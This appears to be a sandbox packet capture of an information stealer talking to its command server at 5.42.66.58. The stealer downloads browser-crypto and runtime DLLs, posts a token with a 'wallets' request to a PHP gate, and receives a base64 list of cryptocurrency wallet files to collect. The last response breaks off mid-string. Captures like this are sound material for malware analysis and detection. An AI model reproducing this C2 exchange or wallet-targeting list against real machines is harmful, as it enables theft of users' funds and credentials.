Dec 27, 2023 17:58:10.961781025 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:10 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Dec 27, 2023 17:58:11.633058071 CET	90	OUT	GET /f059ec3d7eb90876/msvcp140.dll HTTP/1.1 Host: 5.42.66.58 Cache-Control: no-cache
Dec 27, 2023 17:58:12.022571087 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:11 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Dec 27, 2023 17:58:13.125823975 CET	86	OUT	GET /f059ec3d7eb90876/nss3.dll HTTP/1.1 Host: 5.42.66.58 Cache-Control: no-cache
Dec 27, 2023 17:58:13.520289898 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:13 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Dec 27, 2023 17:58:17.330363035 CET	90	OUT	GET /f059ec3d7eb90876/softokn3.dll HTTP/1.1 Host: 5.42.66.58 Cache-Control: no-cache
Dec 27, 2023 17:58:18.110275030 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:17 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Dec 27, 2023 17:58:19.982804060 CET	94	OUT	GET /f059ec3d7eb90876/vcruntime140.dll HTTP/1.1 Host: 5.42.66.58 Cache-Control: no-cache
Dec 27, 2023 17:58:20.369930029 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:20 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Dec 27, 2023 17:58:22.642709017 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAA Host: 5.42.66.58 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:23.555613995 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:24.043926001 CET	464	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCG Host: 5.42.66.58 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 37 63 30 32 36 37 63 30 37 34 31 38 65 63 63 39 38 30 35 36 62 65 32 63 66 32 30 36 38 36 35 61 66 61 30 39 65 66 37 33 37 61 62 64 62 66 30 35 63 33 36 38 64 62 37 66 63 61 34 63 66 61 34 37 37 64 64 66 63 63 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="token"147c0267c07418ecc98056be2cf206865afa09ef737abdbf05c368db7fca4cfa477ddfcc------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="message"wallets------HDGCFHIDAKECFHIEBFCG--
Dec 27, 2023 17:58:24.456902027 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1576 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 46 78 43 61 58 52 6a 62 32 6c 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 48 64 68 62 47 78 6c 64 43 35 6b 59 58 52 38 4d 58 78 43 61 58 52 6a 62 32 6c 75 49 45 4e 76 63 6d 55 67 54 32 78 6b 66 46 78 43 61 58 52 6a 62 32 6c 75 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 6b 59 58 52 38 4d 48 78 45 62 32 64 6c 59 32 39 70 62 6e 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 58 46 4a 68 64 6d 56 75 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 6b 59 58 52 38 4d 48 78 45 59 57 56 6b 59 57 78 31 63 79 42 4e 59 57 6c 75 62 6d 56 30 66 46 78 45 59 57 56 6b 59 57 78 31 63 79 42 4e 59 57 6c 75 62 6d 56 30 58 48 64 68 62 47 78 6c 64 48 4e 63 66 48 4e 6f 5a 53 6f 75 63 33 46 73 61 58 52 6c 66 44 42 38 51 6d 78 76 59 32 74 7a 64 48 4a 6c 59 57 30 67 52 33 4a 6c 5a 57 35 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 58 46 64 68 62 47 78 6c 64 46 64 68 63 32 46 69 61 56 78 44 62 47 6c 6c 62 6e 52 63 56 32 46 73 62 47 56 30 63 31 78 38 4b 69 35 71 63 32 39 75 66 44 42 38 52 58 52 6f 5a 58 4a 6c 64 57 31 38 58 45 56 30 61 47 56 79 5a 58 56 74 58 48 78 72 5a 58 6c 7a 64 47 39 79 5a 58 77 77 66 45 56 73 5a 57 4e 30 63 6e 56 74 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 78 63 52 57 78 6c 59 33 52 79 64 57 30 74 54 46 52 44 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 77 66 45 56 34 62 32 52 31 63 33 78 63 52 58 68 76 5a 48 56 7a 58 48 78 6c 65 47 39 6b 64 58 4d 75 59 32 39 75 5a 69 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 